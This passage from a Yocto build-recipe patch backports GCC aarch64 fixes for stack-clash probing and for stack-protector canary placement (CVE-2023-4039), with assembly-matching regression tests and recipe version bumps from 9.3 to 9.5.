++ HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
++ gcc_assert (multiple_p (poly_size, byte_sp_alignment));
+ /* When doing the final adjustment for the outgoing argument size we can't
+ assume that LR was saved at position 0. So subtract it's offset from the
+ ABI safe buffer so that we don't accidentally allow an adjustment that
+@@ -5513,7 +5515,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ probing. */
+ HOST_WIDE_INT min_probe_threshold
+ = final_adjustment_p
+- ? guard_used_by_caller - cfun->machine->frame.reg_offset[LR_REGNUM]
++ ? (guard_used_by_caller
++ + byte_sp_alignment
++ - cfun->machine->frame.reg_offset[LR_REGNUM])
+ : guard_size - guard_used_by_caller;
+
+ poly_int64 frame_size = cfun->machine->frame.frame_size;
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+new file mode 100644
+index 00000000000..0d8a25d73a2
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+@@ -0,0 +1,55 @@
++/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void f(int, ...);
++void g();
++
++/*
++** test1:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1024
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test1(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test2:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1040
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test2(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x);
++ }
++ g();
++ return 1;
++}
+--
+2.34.1
+
+
+From 12517baf6c88447e3bda3a459ac4c29d61f84e6c Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 15:12:55 +0100
+Subject: [PATCH 08/10] aarch64: Put LR save probe in first 16 bytes
+
+-fstack-clash-protection uses the save of LR as a probe for the next
+allocation. The next allocation could be:
+
+* another part of the static frame, e.g. when allocating SVE save slots
+ or outgoing arguments
+
+* an alloca in the same function
+
+* an allocation made by a callee function
+
+However, when -fomit-frame-pointer is used, the LR save slot is placed
+above the other GPR save slots. It could therefore be up to 80 bytes
+above the base of the GPR save area (which is also the hard fp address).
+
+aarch64_allocate_and_probe_stack_space took this into account when
+deciding how much subsequent space could be allocated without needing
+a probe. However, it interacted badly with:
+
+ /* If doing a small final adjustment, we always probe at offset 0.
+ This is done to avoid issues when LR is not at position 0 or when
+ the final adjustment is smaller than the probing offset. */
+ else if (final_adjustment_p && rounded_size == 0)
+ residual_probe_offset = 0;
+
+which forces any allocation that is smaller than the guard page size
+to be probed at offset 0 rather than the usual offset 1024. It was
+therefore possible to construct cases in which we had:
+
+* a probe using LR at SP + 80 bytes (or some other value >= 16)
+* an allocation of the guard page size - 16 bytes
+* a probe at SP + 0
+
+which allocates guard page size + 64 consecutive unprobed bytes.
+
+This patch requires the LR probe to be in the first 16 bytes of the
+save area when stack clash protection is active. Doing it
+unconditionally would cause code-quality regressions.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Ensure that
+ the LR save slot is in the first 16 bytes of the register save area.
+ (aarch64_allocate_and_probe_stack_space): Remove workaround for
+ when LR was not in the first 16 bytes.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-18.c: New test.
+---
+ gcc/config/aarch64/aarch64.c | 50 +++++----
+ .../aarch64/stack-check-prologue-18.c | 100 ++++++++++++++++++
+ 2 files changed, 127 insertions(+), 23 deletions(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 4c9e11cd7cf..1e8467fdd03 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4686,15 +4686,31 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
+
++#define ALLOCATE_GPR_SLOT(REGNO) \
++ do \
++ { \
++ cfun->machine->frame.reg_offset[REGNO] = offset; \
++ if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM) \
++ cfun->machine->frame.wb_candidate1 = (REGNO); \
++ else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM) \
++ cfun->machine->frame.wb_candidate2 = (REGNO); \
++ offset += UNITS_PER_WORD; \
++ } \
++ while (0)
++
+ if (cfun->machine->frame.emit_frame_chain)
+ {
+ /* FP and LR are placed in the linkage record. */
+- cfun->machine->frame.reg_offset[R29_REGNUM] = 0;
+- cfun->machine->frame.wb_candidate1 = R29_REGNUM;
+- cfun->machine->frame.reg_offset[R30_REGNUM] = UNITS_PER_WORD;
+- cfun->machine->frame.wb_candidate2 = R30_REGNUM;
+- offset = 2 * UNITS_PER_WORD;
++ ALLOCATE_GPR_SLOT (R29_REGNUM);
++ ALLOCATE_GPR_SLOT (R30_REGNUM);
+ }
++ else if (flag_stack_clash_protection
++ && cfun->machine->frame.reg_offset[R30_REGNUM] == SLOT_REQUIRED)
++ /* Put the LR save slot first, since it makes a good choice of probe
++ for stack clash purposes. The idea is that the link register usually
++ has to be saved before a call anyway, and so we lose little by
++ stopping it from being individually shrink-wrapped. */
++ ALLOCATE_GPR_SLOT (R30_REGNUM);
+
+ /* With stack-clash, LR must be saved in non-leaf functions. */
+ gcc_assert (crtl->is_leaf
+@@ -4704,14 +4720,9 @@ aarch64_layout_frame (void)
+ /* Now assign stack slots for them. */
+ for (regno = R0_REGNUM; regno <= R30_REGNUM; regno++)
+ if (cfun->machine->frame.reg_offset[regno] == SLOT_REQUIRED)
+- {
+- cfun->machine->frame.reg_offset[regno] = offset;
+- if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM)
+- cfun->machine->frame.wb_candidate1 = regno;
+- else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM)
+- cfun->machine->frame.wb_candidate2 = regno;
+- offset += UNITS_PER_WORD;
+- }
++ ALLOCATE_GPR_SLOT (regno);
++
++#undef ALLOCATE_GPR_SLOT
+
+ HOST_WIDE_INT max_int_offset = offset;
+ offset = ROUND_UP (offset, STACK_BOUNDARY / BITS_PER_UNIT);
+@@ -5508,16 +5519,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
+ HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
+ gcc_assert (multiple_p (poly_size, byte_sp_alignment));
+- /* When doing the final adjustment for the outgoing argument size we can't
+- assume that LR was saved at position 0. So subtract it's offset from the
+- ABI safe buffer so that we don't accidentally allow an adjustment that
+- would result in an allocation larger than the ABI buffer without
+- probing. */
+ HOST_WIDE_INT min_probe_threshold
+ = final_adjustment_p
+- ? (guard_used_by_caller
+- + byte_sp_alignment
+- - cfun->machine->frame.reg_offset[LR_REGNUM])
++ ? guard_used_by_caller + byte_sp_alignment
+ : guard_size - guard_used_by_caller;
+
+ poly_int64 frame_size = cfun->machine->frame.frame_size;
+@@ -5697,8 +5701,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ if (final_adjustment_p && rounded_size != 0)
+ min_probe_threshold = 0;
+ /* If doing a small final adjustment, we always probe at offset 0.
+- This is done to avoid issues when LR is not at position 0 or when
+- the final adjustment is smaller than the probing offset. */
++ This is done to avoid issues when the final adjustment is smaller
++ than the probing offset. */
+ else if (final_adjustment_p && rounded_size == 0)
+ residual_probe_offset = 0;
+
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+new file mode 100644
+index 00000000000..82447d20fff
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+@@ -0,0 +1,100 @@
++/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void f(int, ...);
++void g();
++
++/*
++** test1:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #4064
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++** str x26, \[sp, #?4128\]
++** ...
++*/
++int test1(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test2:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1040
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test2(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test3:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1024
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test3(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
+--
+2.34.1
+
+
+From f2684e63652bb251d22c79e40081c646df1f36b6 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 8 Aug 2023 01:57:26 +0100
+Subject: [PATCH 09/10] aarch64: Simplify probe of final frame allocation
+
+Previous patches ensured that the final frame allocation only needs
+a probe when the size is strictly greater than 1KiB. It's therefore
+safe to use the normal 1024 probe offset in all cases.
+
+The main motivation for doing this is to simplify the code and
+reduce the number of special cases.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
+ Always probe the residual allocation at offset 1024, asserting
+ that that is in range.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-17.c: Expect the probe
+ to be at offset 1024 rather than offset 0.
+ * gcc.target/aarch64/stack-check-prologue-18.c: Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 12 ++++--------
+ .../gcc.target/aarch64/stack-check-prologue-17.c | 2 +-
+ .../gcc.target/aarch64/stack-check-prologue-18.c | 7 +++++--
+ 3 files changed, 10 insertions(+), 11 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 1e8467fdd03..705f719a2ea 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -5695,16 +5695,12 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ are still safe. */
+ if (residual)
+ {
+- HOST_WIDE_INT residual_probe_offset = guard_used_by_caller;
++ gcc_assert (guard_used_by_caller + byte_sp_alignment <= size);
++
+ /* If we're doing final adjustments, and we've done any full page
+ allocations then any residual needs to be probed. */
+ if (final_adjustment_p && rounded_size != 0)
+ min_probe_threshold = 0;
+- /* If doing a small final adjustment, we always probe at offset 0.
+- This is done to avoid issues when the final adjustment is smaller
+- than the probing offset. */
+- else if (final_adjustment_p && rounded_size == 0)
+- residual_probe_offset = 0;
+
+ aarch64_sub_sp (temp1, temp2, residual, frame_related_p);
+ if (residual >= min_probe_threshold)
+@@ -5715,8 +5711,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT_PRINT_DEC " bytes, probing will be required."
+ "\n", residual);
+
+- emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
+- residual_probe_offset));
++ emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
++ guard_used_by_caller));
+ emit_insn (gen_blockage ());
+ }
+ }
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+index 0d8a25d73a2..f0ec1389771 100644
+--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+@@ -33,7 +33,7 @@ int test1(int z) {
+ ** ...
+ ** str x30, \[sp\]
+ ** sub sp, sp, #1040
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+index 82447d20fff..71d33ba34e9 100644
+--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+@@ -8,8 +8,9 @@ void g();
+ ** test1:
+ ** ...
+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #4064
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+@@ -49,8 +50,9 @@ int test1(int z) {
+ ** test2:
+ ** ...
+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #1040
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+@@ -77,6 +79,7 @@ int test2(int z) {
+ ** test3:
+ ** ...
+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #1024
+ ** cbnz w0, .*
+ ** bl g
+--
+2.34.1
+
+
+From bf3eeaa0182a92987570d9c787bd45079eebf528 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Thu, 15 Jun 2023 19:16:52 +0100
+Subject: [PATCH 10/10] aarch64: Make stack smash canary protect saved
+ registers
+
+AArch64 normally puts the saved registers near the bottom of the frame,
+immediately above any dynamic allocations. But this means that a
+stack-smash attack on those dynamic allocations could overwrite the
+saved registers without needing to reach as far as the stack smash
+canary.
+
+The same thing could also happen for variable-sized arguments that are
+passed by value, since those are allocated before a call and popped on
+return.
+
+This patch avoids that by putting the locals (and thus the canary) below
+the saved registers when stack smash protection is active.
+
+The patch fixes CVE-2023-4039.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_save_regs_above_locals_p):
+ New function.
+ (aarch64_layout_frame): Use it to decide whether locals should
+ go above or below the saved registers.
+ (aarch64_expand_prologue): Update stack layout comment.
+ Emit a stack tie after the final adjustment.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-protector-8.c: New test.
+ * gcc.target/aarch64/stack-protector-9.c: Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 46 +++++++++++++--
+ .../gcc.target/aarch64/stack-protector-8.c | 58 +++++++++++++++++++
+ .../gcc.target/aarch64/stack-protector-9.c | 33 +++++++++++
+ 3 files changed, 133 insertions(+), 4 deletions(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 705f719a2ea..3d094214fac 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4622,6 +4622,20 @@ aarch64_needs_frame_chain (void)
+ return aarch64_use_frame_pointer;
+ }
+
++/* Return true if the current function should save registers above
++ the locals area, rather than below it. */
++
++static bool
++aarch64_save_regs_above_locals_p ()
++{
++ /* When using stack smash protection, make sure that the canary slot
++ comes between the locals and the saved registers. Otherwise,
++ it would be possible for a carefully sized smash attack to change
++ the saved registers (particularly LR and FP) without reaching the
++ canary. */
++ return crtl->stack_protect_guard;
++}
++
+ /* Mark the registers that need to be saved by the callee and calculate
+ the size of the callee-saved registers area and frame record (both FP
+ and LR may be omitted). */
+@@ -4686,6 +4700,16 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
+
++ bool regs_at_top_p = aarch64_save_regs_above_locals_p ();
++
++ if (regs_at_top_p)
++ {
++ cfun->machine->frame.bytes_below_hard_fp += get_frame_size ();
++ cfun->machine->frame.bytes_below_hard_fp
++ = aligned_upper_bound (cfun->machine->frame.bytes_below_hard_fp,
++ STACK_BOUNDARY / BITS_PER_UNIT);
++ }
++
+ #define ALLOCATE_GPR_SLOT(REGNO) \
+ do \
+ { \
+@@ -4758,9 +4782,11 @@ aarch64_layout_frame (void)
+ HOST_WIDE_INT varargs_and_saved_regs_size
+ = offset + cfun->machine->frame.saved_varargs_size;
+
++ cfun->machine->frame.bytes_above_hard_fp = varargs_and_saved_regs_size;
++ if (!regs_at_top_p)
++ cfun->machine->frame.bytes_above_hard_fp += get_frame_size ();
+ cfun->machine->frame.bytes_above_hard_fp
+- = aligned_upper_bound (varargs_and_saved_regs_size
+- + get_frame_size (),
++ = aligned_upper_bound (cfun->machine->frame.bytes_above_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT);
+
+ /* Both these values are already aligned. */
+@@ -4772,6 +4798,9 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_above_locals
+ = cfun->machine->frame.saved_varargs_size;
++ if (regs_at_top_p)
++ cfun->machine->frame.bytes_above_locals
++ += cfun->machine->frame.saved_regs_size;
+
+ cfun->machine->frame.initial_adjust = 0;
+ cfun->machine->frame.final_adjust = 0;
+@@ -5764,10 +5793,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ | for register varargs |
+ | |
+ +-------------------------------+
+- | local variables | <-- frame_pointer_rtx
++ | local variables (1) | <-- frame_pointer_rtx
+ | |
+ +-------------------------------+
+- | padding | \
++ | padding (1) | \
+ +-------------------------------+ |
+ | callee-saved registers | | frame.saved_regs_size
+ +-------------------------------+ |
+@@ -5775,6 +5804,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ +-------------------------------+ |
+ | FP' | / <- hard_frame_pointer_rtx (aligned)
+ +-------------------------------+
++ | local variables (2) |
++ +-------------------------------+
++ | padding (2) |
++ +-------------------------------+
+ | dynamic allocation |
+ +-------------------------------+
+ | padding |
+@@ -5784,6 +5817,9 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ +-------------------------------+
+ | | <-- stack_pointer_rtx (aligned)
+
++ The regions marked (1) and (2) are mutually exclusive. (2) is used
++ when aarch64_save_regs_above_locals_p is true.
++
+ Dynamic stack allocations via alloca() decrease stack_pointer_rtx
+ but leave frame_pointer_rtx and hard_frame_pointer_rtx
+ unchanged.
+@@ -5937,6 +5973,8 @@ aarch64_expand_prologue (void)
+ that is assumed by the called. */
+ aarch64_allocate_and_probe_stack_space (tmp1_rtx, tmp0_rtx, final_adjust,
+ !frame_pointer_needed, true);
++ if (emit_frame_chain && maybe_ne (final_adjust, 0))
++ emit_insn (gen_stack_tie (stack_pointer_rtx, hard_frame_pointer_rtx));
+ }
+
+ /* Return TRUE if we can use a simple_return insn.
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+new file mode 100644
+index 00000000000..c5e7deef6c1
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+@@ -0,0 +1,58 @@
++/* { dg-options " -O -fstack-protector-strong -mstack-protector-guard=sysreg -mstack-protector-guard-reg=tpidr2_el0 -mstack-protector-guard-offset=16" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void g(void *);
++
++/*
++** test1:
++** sub sp, sp, #288
++** stp x29, x30, \[sp, #?272\]
++** add x29, sp, #?272
++** mrs (x[0-9]+), tpidr2_el0
++** ldr (x[0-9]+), \[\1, #?16\]
++** str \2, \[sp, #?264\]
++** mov \2, *0
++** add x0, sp, #?8
++** bl g
++** ...
++** mrs .*
++** ...
++** bne .*
++** ...
++** ldp x29, x30, \[sp, #?272\]
++** add sp, sp, #?288
++** ret
++** bl __stack_chk_fail
++*/
++int test1() {
++ int y[0x40];
++ g(y);
++ return 1;
++}
++
++/*
++** test2:
++** stp x29, x30, \[sp, #?-16\]!
++** mov x29, sp
++** sub sp, sp, #1040
++** mrs (x[0-9]+), tpidr2_el0
++** ldr (x[0-9]+), \[\1, #?16\]
++** str \2, \[sp, #?1032\]
++** mov \2, *0
++** add x0, sp, #?8
++** bl g
++** ...
++** mrs .*
++** ...
++** bne .*
++** ...
++** add sp, sp, #?1040
++** ldp x29, x30, \[sp\], #?16
++** ret
++** bl __stack_chk_fail
++*/
++int test2() {
++ int y[0x100];
++ g(y);
++ return 1;
++}
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+new file mode 100644
+index 00000000000..58f322aa480
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+@@ -0,0 +1,33 @@
++/* { dg-options "-O2 -mcpu=neoverse-v1 -fstack-protector-all" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++/*
++** main:
++** ...
++** stp x29, x30, \[sp, #?-[0-9]+\]!
++** ...
++** sub sp, sp, #[0-9]+
++** ...
++** str x[0-9]+, \[x29, #?-8\]
++** ...
++*/
++int f(const char *);
++void g(void *);
++int main(int argc, char* argv[])
++{
++ int a;
++ int b;
++ char c[2+f(argv[1])];
++ int d[0x100];
++ char y;
++
++ y=42; a=4; b=10;
++ c[0] = 'h'; c[1] = '\0';
++
++ c[f(argv[2])] = '\0';
++
++ __builtin_printf("%d %d\n%s\n", a, b, c);
++ g(d);
++
++ return 0;
++}
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/gcc/gcc-common.inc b/meta/recipes-devtools/gcc/gcc-common.inc
index 3dcfdf835f..69a3536965 100644
--- a/meta/recipes-devtools/gcc/gcc-common.inc
+++ b/meta/recipes-devtools/gcc/gcc-common.inc
@@ -1,5 +1,6 @@
SUMMARY = "GNU cc and gcc C compilers"
HOMEPAGE = "http://www.gnu.org/software/gcc/"
+DESCRIPTION = "The GNU Compiler Collection includes front ends for C, C++, Objective-C, Fortran, Ada, Go, and D, as well as libraries for these languages (libstdc++,...). GCC was originally written as the compiler for the GNU operating system."
SECTION = "devel"
LICENSE = "GPL"
@@ -99,7 +100,7 @@ BINV = "${PV}"
#S = "${WORKDIR}/gcc-${PV}"
S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
-B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B ?= "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
target_includedir ?= "${includedir}"
target_libdir ?= "${libdir}"
diff --git a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
index bf53c5cd78..bf53c5cd78 100644
--- a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
index b43cca0c52..b43cca0c52 100644
--- a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
index 40a6c4feff..40a6c4feff 100644
--- a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
index dd430b57eb..dd430b57eb 100644
--- a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
index f3c7058114..f3c7058114 100644
--- a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-shared-source.inc b/meta/recipes-devtools/gcc/gcc-shared-source.inc
index aac4b49313..4baf7874d2 100644
--- a/meta/recipes-devtools/gcc/gcc-shared-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-shared-source.inc
@@ -9,3 +9,6 @@ SRC_URI = ""
do_configure[depends] += "gcc-source-${PV}:do_preconfigure"
do_populate_lic[depends] += "gcc-source-${PV}:do_unpack"
+
+# patch is available via gcc-source recipe
+CVE_CHECK_WHITELIST += "CVE-2023-4039"
diff --git a/meta/recipes-devtools/gcc/gcc-source.inc b/meta/recipes-devtools/gcc/gcc-source.inc
index 03bab97815..224b7778ef 100644
--- a/meta/recipes-devtools/gcc/gcc-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-source.inc
@@ -18,6 +18,7 @@ INHIBIT_DEFAULT_DEPS = "1"
DEPENDS = ""
PACKAGES = ""
+B = "${WORKDIR}/build"
# This needs to be Python to avoid lots of shell variables becoming dependencies.
python do_preconfigure () {
diff --git a/meta/recipes-devtools/gcc/gcc-source_9.3.bb b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
index b890fa33ea..b890fa33ea 100644
--- a/meta/recipes-devtools/gcc/gcc-source_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc_9.3.bb b/meta/recipes-devtools/gcc/gcc_9.5.bb
index 7d93590588..7d93590588 100644
--- a/meta/recipes-devtools/gcc/gcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
index 0c698c26ec..0c698c26ec 100644
--- a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc_9.3.bb b/meta/recipes-devtools/gcc/libgcc_9.5.bb
index ea210a1130..ea210a1130 100644
--- a/meta/recipes-devtools/gcc/libgcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgfortran_9.3.bb b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
index 71dd8b4bdc..71dd8b4bdc 100644
--- a/meta/recipes-devtools/gcc/libgfortran_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
